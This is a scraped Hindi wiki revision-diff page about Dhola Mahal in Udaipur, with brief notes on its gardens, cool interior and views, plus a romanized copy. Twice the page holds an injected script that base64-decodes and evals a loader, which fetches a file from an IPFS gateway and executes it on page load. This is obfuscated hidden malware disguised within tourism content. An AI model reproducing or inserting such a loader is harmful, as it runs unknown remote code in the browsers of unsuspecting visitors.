Difference between revisions of "धोला महल उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मंजिल " to " मंज़िल ")
 
Line 2: Line 2:
 
*जिसके चारों तरफ भूलभुलैया के रूप में बनी हुई नालियाँ, पुष्पों की क्यारियाँ तथा ताड़ के ऊँचे- ऊँचे वृक्ष लगे हुए हैं। जिन से हरियाली की अच्छी छटा बनी रहती है।
 
*जिसके चारों तरफ भूलभुलैया के रूप में बनी हुई नालियाँ, पुष्पों की क्यारियाँ तथा ताड़ के ऊँचे- ऊँचे वृक्ष लगे हुए हैं। जिन से हरियाली की अच्छी छटा बनी रहती है।
 
*इन महलों के जल के मध्य में बना हुआ होने के कारण यहाँ उष्ण काल में बड़ी ठंढक रहती है।  
 
*इन महलों के जल के मध्य में बना हुआ होने के कारण यहाँ उष्ण काल में बड़ी ठंढक रहती है।  
*महल की दूसरी मंजिल से सरोवर, राजमहल एवं नगर का दृश्य बड़ा रमणीय लगता है।
+
*महल की दूसरी मंज़िल से सरोवर, राजमहल एवं नगर का दृश्य बड़ा रमणीय लगता है।
 
{{प्रचार}}
 
{{प्रचार}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__

Latest revision as of 14:18, 3 February 2013

  • udayapur rajasthan ka ek khoobasoorat shahar hai aur udayapur paryatan ka sabase akarshak sthal mana jata hai.
  • jisake charoan taraph bhoolabhulaiya ke roop mean bani huee naliyaan, pushpoan ki kyariyaan tatha ta d ke ooanche- ooanche vriksh lage hue haian. jin se hariyali ki achchhi chhata bani rahati hai.
  • in mahaloan ke jal ke madhy mean bana hua hone ke karan yahaan ushn kal mean b di thandhak rahati hai.
  • mahal ki doosari manzil se sarovar, rajamahal evan nagar ka drishy b da ramaniy lagata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>